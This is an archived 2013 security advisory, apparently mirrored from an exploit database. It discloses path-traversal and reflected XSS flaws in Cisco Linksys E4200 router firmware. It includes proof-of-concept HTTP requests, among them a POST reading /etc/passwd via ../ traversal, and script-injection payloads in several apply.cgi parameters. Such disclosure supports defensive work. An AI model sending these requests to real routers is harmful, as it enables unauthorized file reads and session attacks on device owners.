Skip to content
cyberexploits
webapphardwaretext

Cisco Linksys E4200 - Multiple Vulnerabilities

Cisco Linksys E4200 - Multiple Vulnerabilities

Publié le 2013-05-07

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/hardware/webapps/25292.txt7eac4c3a
raw
-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA256



=============================================



XSS, LFI in Cisco, Linksys E4200 Firmware



=============================================



URL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html



=============================================





January 30, 2013



=============================================



Keywords



=============================================



XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit,

Zero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp



CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682,

CVE-2013-2683, CVE-2013-2684



=============================================



Summary



Reflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router

Firmware Version: 1.0.05 build 7 were discovered by our Researchers in

January 2013 and finally acknowledged by Linksys in April 2013. The Vendor

is unable to Patch the Vulnerability in a reasonable timeframe. This

document will introduce and discuss the vulnerability and provide

Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version

1.10 Released on July 9, 2012, and prior versions.



=============================================



Overview



Linksys is a brand of home and small office networking products and a

company founded in 1988, which was acquired by Cisco Systems in 2003. In

2013, as part of its push away from the consumer market, Cisco sold their

home networking division and Linksys to Belkin. Former Linksys products are

now branded as Linksys by Cisco.







Products currently and previously sold under the Linksys brand name include

broadband and wireless routers, consumer and small business grade Ethernet

switching, VoIP equipment, wireless internet video camera, AV products,

network storage systems, and other products.







Linksys products were widely available in North America off-the-shelf from

both consumer electronics stores (CompUSA and Best Buy), internet

retailers, and big-box retail stores (WalMart). Linksys' significant

competition as an independent networking firm were D-Link and NetGear, the

latter for a time being a brand of Cisco competitor Nortel.



=============================================



Vendor Software Fingerprint



=============================================



# Copyright (C) 2009, CyberTAN Corporation



# All Rights Reserved.



#



# THIS SOFTWARE IS OFFERED "AS IS", AND CYBERTAN GRANTS NO WARRANTIES OF

ANY



# KIND, EXPRESS OR IMPLIED, BY STATUTE.....



=============================================



The PoC's



=============================================



LFI PoC



=============================================



POST /storage/apply.cgi HTTP/1.1



HOST: my.vunerable.e4500.firmware



submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila

_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd



=============================================



XSS PoC



=============================================



    /apply.cgi [log_type parameter]



    /apply.cgi [ping_ip parameter]



    /apply.cgi [ping_size parameter]



    /apply.cgi [submit_type parameter]



    /apply.cgi [traceroute_ip parameter]



    /storage/apply.cgi [new_workgroup parameter]



    /storage/apply.cgi [submit_button parameter]



=============================================



POST /apply.cgi HTTP/1.1



�..



change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t

ype=&log_type=ilog14568"%3balert(1)//482



=============================================



Other XSS PoC�s



=============================================



&ping_ip='><script>alert(1)</script>



&ping_size='><script>alert(1)</script>



&submit_type=start_traceroute'%3balert(1)//



&traceroute_ip=a.b.c.d"><script>alert(1)</script>



=============================================



CVE Information



=============================================



File path traversal CVE-2013-2678



Cross-site scripting (reflected) CVE-2013-2679



Cleartext submission of password CVE-2013-2680



Password field with autocomplete enabled CVE-2013-2681



Frameable response (Clickjacking) CVE-2013-2682



Private IP addresses disclosed CVE-2013-2683



HTML does not specify charset CVE-2013-2684



CVSS Version 2 Score = 4.5



=============================================



END



=============================================



-----BEGIN PGP SIGNATURE-----

Version: 10.2.0.2526



wsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser

M3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG

uJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy

ul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy

7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI

V8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg==

=w123

-----END PGP SIGNATURE-----

Voir sur GitHub